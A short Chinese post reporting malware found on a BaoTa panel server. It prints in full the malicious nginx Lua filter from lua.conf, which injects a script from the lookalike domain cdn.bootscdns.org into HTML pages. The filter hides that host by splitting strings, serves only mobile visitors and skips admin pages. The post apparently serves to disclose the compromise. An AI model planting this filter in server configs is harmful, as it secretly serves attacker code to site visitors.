宝塔 ngnix 被加载js木马
header_filter_by_lua_block{
ngx.header.content_length = nil
}
body_filter_by_lua_block{
local bt_request_uri = ngx.var.request_uri;
local h, err = ngx.resp.get_headers()
local remote_js = "htt".."ps://cd".."n.boot".."scdn".."s.org/aja".."x/lib".."s/jquer".."y/3.".."6"..".4/jquer".."y.js"
function string.startsWith(String,Start)
return string.sub(String,1,string.len(Start))==Start
end
if not ( string.find(string.lower(ngx.req.get_headers()['User-Agent']),"windows") or string.find(string.lower(ngx.req.get_headers()['User-Agent']),"macintosh") ) and h["Content-Type"] and string.startsWith(h["Content-Type"],"text/html") and ( ngx.status==200 or ngx.status==401 or ngx.status==403 or ngx.status==404 ) and not string.find (bt_request_uri,"admin") and (ngx.var.scheme=="http" or ngx.var.scheme=="https") then
local ctx = ngx.ctx
if ctx.buffers == nil then
ctx.buffers = {}
ctx.nbuffers = 0
end
local data = ngx.arg[1]
local eof = ngx.arg[2]
local next_idx = ctx.nbuffers + 1
if not eof then
if data then
if string.find(data,"</head") and not string.find(data,remote_js) then
data = string.gsub(data, "</head", "<scrip".."t type=\"text/javascript\" src=\""..remote_js.."\"></script>\r\n</head",1)
end
ctx.buffers[next_idx] = data
ctx.nbuffers = next_idx
ngx.arg[1] = nil
end
return
elseif data then
if string.find(data,"</head") and not string.find(data,remote_js) then
data = string.gsub(data, "</head", "<scrip".."t type=\"text/javascript\" src=\""..remote_js.."\"></script>\r\n</head",1)
end
ctx.buffers[next_idx] = data
ctx.nbuffers = next_idx
end
assert(ctx.buffers)
assert(ctx.nbuffers ~= 0, "buffer must not be empty")
ngx.arg[1] = table.concat(ngx.ctx.buffers)
end
}文件位置:/www/server/panel/vhost/nginx/lua.conf
